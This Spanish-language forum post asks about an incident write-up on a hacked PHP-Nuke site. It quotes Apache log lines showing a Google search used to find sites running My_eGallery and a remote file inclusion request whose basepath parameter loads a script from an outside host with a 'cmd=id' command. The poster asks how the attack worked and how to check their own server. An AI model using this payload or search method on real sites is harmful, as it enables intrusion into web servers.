duda con pag. que fue hackeada hola maestros navegando por la internet encontre esto :
http://www.todo-linux.com/modules.ph...ticle&sid=1740
bueno explica como fue hackedo un sitio pero tengo dos dudas hacerca de eso :
Análisis del log de ataque
200.210.233.250 - - [02/Apr/2004:08:56:03 +0200] "GET /modules.php?name=My_eGallery HTTP/1.0" 200 5402 "http://www.google.com.br/sea rch?q=gente+/modules.php%3Fname%3DMy_eGallery+&hl=pt-BR&lr=&ie=UTF-8&oe=UTF-8&start=40&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Win dows 98)"
Una vez más vemos que nuestro amigo atacante procedia del gran google, inició una busqueda masiva en busca de web que tuviesen nuestro modulo de fotos. En la 7º posicion del rankink estabamos nosotros y fuimos las victimas.
¿a que se refiere con lo de "nuestro modulo de fotos" y como las busca el google?
200.210.233.250 - - [02/Apr/2004:08:56:44 +0200] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.skater0x.h pg.com.br/cse.gif?&cmd=id HTTP/1.0" 200 795 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Una cuantas lineas despues, y despues de navegar por nuestro site , nuestro atacante particular, lanza un comando via URI para ver si nuestra version es vulnerable, al darse cuanta que SI lo es, inicia el ataque....
¿como puedo saber si mi version es vulnerable , dado que ocupo apache tanto en windows y en red hat 9.0?
bueno saludos y gracias...
